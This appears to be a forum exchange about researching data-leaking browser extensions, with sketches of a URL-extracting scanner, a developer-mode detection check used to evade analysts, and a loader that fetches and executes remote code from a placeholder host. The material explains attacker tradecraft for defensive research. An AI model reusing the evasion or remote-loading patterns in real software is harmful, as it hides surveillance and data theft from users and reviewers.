I’ve always thought that it’s crazy how so many extensions can basically read the content of the webpages you browse. I’m wondering if the research should go further: find all extensions that have URLs baked into them, or hashes (of domains?), then check what they do when you visit those URLs.
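Roughly the kind of static pass I mean, as a minimal sketch (the unpacked-extension path, file filter, and URL regex are placeholders I made up): walk an unpacked extension, pull out anything that looks like a hard-coded URL, and feed those into a later step that visits them and watches what the extension does.

```typescript
import { readdirSync, readFileSync, statSync } from "node:fs";
import { join } from "node:path";

// Naive pattern for URL-looking string literals; extensions can also hide
// endpoints behind concatenation, encoding, or hashing, which this would miss.
const URL_RE = /https?:\/\/[^\s"'`)]+/g;

// Recursively collect URL-like literals from an unpacked extension's files.
function collectUrls(dir: string, found: Set<string> = new Set()): Set<string> {
  for (const name of readdirSync(dir)) {
    const path = join(dir, name);
    if (statSync(path).isDirectory()) {
      collectUrls(path, found);
    } else if (/\.(js|json|html)$/.test(name)) {
      for (const match of readFileSync(path, "utf8").match(URL_RE) ?? []) {
        found.add(match);
      }
    }
  }
  return found;
}

// "./unpacked-extension" is a placeholder for an extension unpacked from its CRX.
console.log([...collectUrls("./unpacked-extension")]);
```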
Without a doubt the research could continue on this. We had many opportunities to make the scan even wider, and we would almost certainly have uncovered more extensions. The number of leaking extensions should not be taken as definitive.
There are resource constraints. Those extensions try to actively detect whether you are in developer mode. It took us a while to get around such measures, and we are certain we missed many extensions due to, for example, our use of a Docker container. Ideally you want an environment as close to a real user's as possible.
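One way an extension can do this, as a rough sketch (TypeScript, assuming the @types/chrome typings; it relies on chrome.management.getSelf, which an extension can call without extra permissions — an illustration of the technique, not necessarily the exact check the extensions we found used):

```typescript
// An extension loaded via "Load unpacked" in developer mode reports
// installType "development", while a Chrome Web Store install reports "normal".
chrome.management.getSelf((info) => {
  if (info.installType === "development") {
    // Looks like a developer or analyst environment: stay dormant.
    return;
  }
  // ...the suspicious behaviour would only run for ordinary installs...
});
```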
Without infrastructure this doesn't scale.
The same goes for the code analysis you proposed. There are already tools that do that (see Secure Annex). Often the extensions download remote code that is responsible for the data exfiltration, or the code is obfuscated multiple times. Ideally you want to run the extension in a browser and inspect its code during execution.
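As an illustration of why the shipped package alone tells you little (a hedged sketch; the URL and names are invented), the reviewed code can be nothing more than a loader, with the actual logic only materialising at runtime:

```typescript
// Hypothetical loader pattern: the packaged extension contains nothing
// obviously malicious, it just pulls a script from a remote server and
// executes it, so the real behaviour exists only while the extension runs.
async function loadRemotePayload(): Promise<void> {
  // Invented URL; in practice this is often disguised as a "config" or "update" fetch.
  const resp = await fetch("https://updates.example.invalid/payload.js");
  const body = await resp.text();
  // Executing the downloaded string sidesteps any static review of the package.
  new Function(body)();
}

loadRemotePayload();
```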